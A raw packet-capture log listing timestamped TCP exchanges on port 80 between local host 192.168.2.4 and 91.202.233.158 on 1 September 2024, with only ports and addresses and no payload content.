Sep 1, 2024 18:28:13.909791946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.909802914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.909816980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.909827948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.909837008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.909847975 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.909857035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.909869909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.909897089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.910399914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910409927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910419941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910444975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.910470009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.910502911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910512924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910521984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910531998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.910546064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.910566092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.911267996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.911278963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.911288023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.911312103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.911317110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.911323071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.911331892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.911333084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.911360025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.911382914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038229942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038258076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038286924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038305998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038306952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038317919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038327932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038338900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038341999 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038348913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038356066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038363934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038378954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038388968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038392067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038398981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038413048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038431883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038455009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038635969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038671970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038681030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038691044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038713932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038736105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038752079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038762093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038773060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.038781881 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.038815975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039129972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039174080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039184093 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039186001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039211988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039227962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039313078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039323092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039331913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039341927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039366007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039392948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039568901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039619923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039792061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039803982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039813042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039834023 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039854050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039877892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039889097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039897919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039910078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.039917946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.039942980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040071011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040081978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040091991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040112019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040138960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040535927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040546894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040556908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040579081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040592909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040663958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040674925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040683985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040693998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040702105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040731907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040908098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040919065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040927887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040939093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040949106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.040955067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040980101 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.040990114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.041598082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041608095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041618109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041639090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.041667938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.041726112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041735888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041744947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041755915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.041768074 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.041793108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.041995049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042006969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042016983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042026997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042032003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042038918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042058945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042081118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042742014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042751074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042762041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042778015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042787075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042798042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042803049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042808056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042819977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.042834997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042843103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.042871952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043050051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043060064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043068886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043080091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043090105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043090105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043117046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043132067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043626070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043651104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043662071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043664932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043689966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043698072 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043806076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043816090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043824911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043838024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.043843985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.043874025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.044045925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.044056892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.044084072 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.044107914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.124916077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.124988079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.124999046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125000954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125026941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125036001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125041008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125046015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125056982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125073910 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125099897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125204086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125215054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125225067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125246048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125267029 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125365973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125376940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125386000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125396013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125406027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125406981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125416040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125427008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125432014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125446081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125472069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.125488997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.125528097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.169306993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169342995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169353008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169414043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169424057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169433117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169444084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169457912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.169506073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.169914961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169925928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169934988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169945955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169955969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169964075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.169965982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169975996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169981956 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.169986963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.169997931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170001984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170008898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170020103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170038939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170063019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170494080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170510054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170519114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170528889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170541048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170542955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170551062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170556068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170562029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170572996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170583010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170591116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170594931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170600891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170609951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170624971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170634031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170636892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170643091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170654058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170659065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170664072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170674086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170689106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170717001 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170770884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170782089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170803070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170810938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170814037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170825005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170835018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170836926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170845985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170849085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170857906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170867920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170877934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170878887 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170888901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170897007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170907021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.170921087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.170953035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171509981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171520948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171530008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171540976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171547890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171550989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171561956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171572924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171572924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171585083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171596050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171606064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171612024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171617031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171627045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171638012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171642065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171649933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171659946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171662092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171669960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.171685934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.171711922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172410965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172421932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172430038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172440052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172450066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172461987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172462940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172472000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172486067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172488928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172497988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172501087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172511101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172516108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172521114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172530890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172540903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172550917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172552109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172563076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172574043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.172584057 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172604084 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.172625065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173506021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173516989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173526049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173536062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173547029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173552990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173557043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173567057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173577070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173583984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173588037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173598051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173603058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173608065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173616886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173624039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173628092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173639059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173643112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173650026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173660994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.173667908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173690081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.173702955 CEST	56177	80	192.168.2.4	91.202.233.158
